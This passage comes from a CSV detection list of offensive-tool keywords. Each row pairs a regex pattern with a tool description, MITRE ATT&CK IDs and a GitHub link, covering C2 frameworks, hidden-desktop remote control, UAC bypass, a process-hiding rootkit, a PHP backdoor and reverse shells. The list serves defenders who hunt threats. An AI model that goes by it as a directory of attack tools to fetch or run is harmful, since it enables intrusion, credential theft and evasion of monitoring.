- T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*HeroinnServerCommand*",".{0,1000}HeroinnServerCommand.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*herrcore/LocalShellExtParse*",".{0,1000}herrcore\/LocalShellExtParse.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","1","N/A","9","1","19","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z" "*Hey Dear! You Have Won Free Rs 399 Jio Recharge*",".{0,1000}Hey\sDear!\sYou\sHave\sWon\sFree\sRs\s399\sJio\sRecharge.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*hfiref0x/UACME*",".{0,1000}hfiref0x\/UACME.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5924","1287","2024-04-17T00:56:06Z","2015-03-28T12:04:33Z" "*hfiref0x/WDExtract*",".{0,1000}hfiref0x\/WDExtract.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*Hibr2Dmp.exe*",".{0,1000}Hibr2Dmp\.exe.{0,1000}","offensive_tool_keyword","Hibr2Dmp","Convert hiberfil.sys to a dump file with hibr2dmp (can be used with windbg to exploit lsass dump)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/dump_lsass_by_converting_hiberfil_to_dmp.ps1","1","1","N/A","N/A","2","122","13","2024-04-24T09:54:32Z","2022-12-05T12:40:02Z" "*Hidden.Desktop.mp4*",".{0,1000}Hidden\.Desktop\.mp4.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*HiddenDesktop * *",".{0,1000}HiddenDesktop\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*HiddenDesktop.*",".{0,1000}HiddenDesktop\..{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*HiddenDesktop.cpp*",".{0,1000}HiddenDesktop\.cpp.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*HiddenDesktop.exe*",".{0,1000}HiddenDesktop\.exe.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*HiddenDesktop.x64.bin*",".{0,1000}HiddenDesktop\.x64\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*HiddenDesktop.x86.bin*",".{0,1000}HiddenDesktop\.x86\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*HiddenDesktop.zip*",".{0,1000}HiddenDesktop\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*HiddenDesktop_ControlWindow*",".{0,1000}HiddenDesktop_ControlWindow.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*HiddenUser.ps1*",".{0,1000}HiddenUser\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*hide-implant*",".{0,1000}hide\-implant.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*HideProcess*",".{0,1000}HideProcess.{0,1000}","offensive_tool_keyword","HideProcess","process injection rootkit","T1055 - T1055.012 - T1055.013 - T1055.015 - T1055.017","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/landhb/HideProcess","1","1","N/A","N/A","6","588","111","2019-03-26T03:35:57Z","2017-03-07T01:30:15Z" "*HIJACK_DLL_PATH*",".{0,1000}HIJACK_DLL_PATH.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*hijack_hunter *",".{0,1000}hijack_hunter\s.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","0","N/A","10","10","129","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" "*hijack_remote_thread*",".{0,1000}hijack_remote_thread.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*hijackablepath.c*",".{0,1000}hijackablepath\.c.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*hijackablepath.o*",".{0,1000}hijackablepath\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*hijackCLSIDpersistence.*",".{0,1000}hijackCLSIDpersistence\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*hijackDll*WINMM.dll*",".{0,1000}hijackDll.{0,1000}WINMM\.dll.{0,1000}","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*Hijacked timer queue handle from the target process: *",".{0,1000}Hijacked\stimer\squeue\shandle\sfrom\sthe\starget\sprocess\:\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*Hijacked worker factory handle from the target process: *",".{0,1000}Hijacked\sworker\sfactory\shandle\sfrom\sthe\starget\sprocess\:\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*Hijacker*",".{0,1000}Hijacker.{0,1000}","offensive_tool_keyword","Hijacker","Hijacker is a Graphical User Interface for the penetration testing tools Aircrack-ng. Airodump-ng. MDK3 and Reaver. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses.This application requires an ARM android device with an internal wireless adapter that supports Monitor Mode. A few android devices do. but none of them natively. This means that you will need a custom firmware. Any device that uses the BCM4339 chipset (MSM8974. such as Nexus 5. Xperia Z1/Z2. LG G2. LG G Flex. Samsung Galaxy Note 3) will work with Nexmon (which also supports some other chipsets). Devices that use BCM4330 can use bcmon.","T1135 - T1175 - T1179 - T1189 - T1202","TA0002 - TA0007 - - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/chrisk44/Hijacker","1","0","N/A","N/A","10","2320","419","2020-08-26T19:01:31Z","2016-11-25T01:39:07Z" "*HijackHunter.csproj*",".{0,1000}HijackHunter\.csproj.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*HijackHunter.exe*",".{0,1000}HijackHunter\.exe.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*Hijack-MultipleKeys -dll *",".{0,1000}Hijack\-MultipleKeys\s\-dll\s.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*hijackProgDirMissingDll*",".{0,1000}hijackProgDirMissingDll.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*HInvokeHashGen.cs*",".{0,1000}HInvokeHashGen\.cs.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*hiphp *--url*",".{0,1000}hiphp\s.{0,1000}\-\-url.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp.hiphplinkextractor*",".{0,1000}hiphp\.hiphplinkextractor.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp.hiphpversion*",".{0,1000}hiphp\.hiphpversion.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp-0.3.4.deb*",".{0,1000}hiphp\-0\.3\.4\.deb.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp-0.3.5.deb*",".{0,1000}hiphp\-0\.3\.5\.deb.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp-0.3.6.deb*",".{0,1000}hiphp\-0\.3\.6\.deb.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp-1.*.*.deb*",".{0,1000}hiphp\-1\..{0,1000}\..{0,1000}\.deb.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp-cli.bat*",".{0,1000}hiphp\-cli\.bat.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp-desktop.bat*",".{0,1000}hiphp\-desktop\.bat.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp-termux.sh*",".{0,1000}hiphp\-termux\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*hiphp-tk.bat*",".{0,1000}hiphp\-tk\.bat.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*history_cmd",".{0,1000}history_cmd","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*Hit enter to run shellcode/payload without creating a new thread*",".{0,1000}Hit\senter\sto\srun\sshellcode\/payload\swithout\screating\sa\snew\sthread.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*Hit Slack API rate limit !!!*",".{0,1000}Hit\sSlack\sAPI\srate\slimit\s!!!.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*HiveJack-Console.exe*",".{0,1000}HiveJack\-Console\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*hktalent/scan4all*",".{0,1000}hktalent\/scan4all.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*hktalent/scan4all*",".{0,1000}hktalent\/scan4all.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*hlldz/dazzleUP*",".{0,1000}hlldz\/dazzleUP.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*hlldz/Phant0m*",".{0,1000}hlldz\/Phant0m.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense 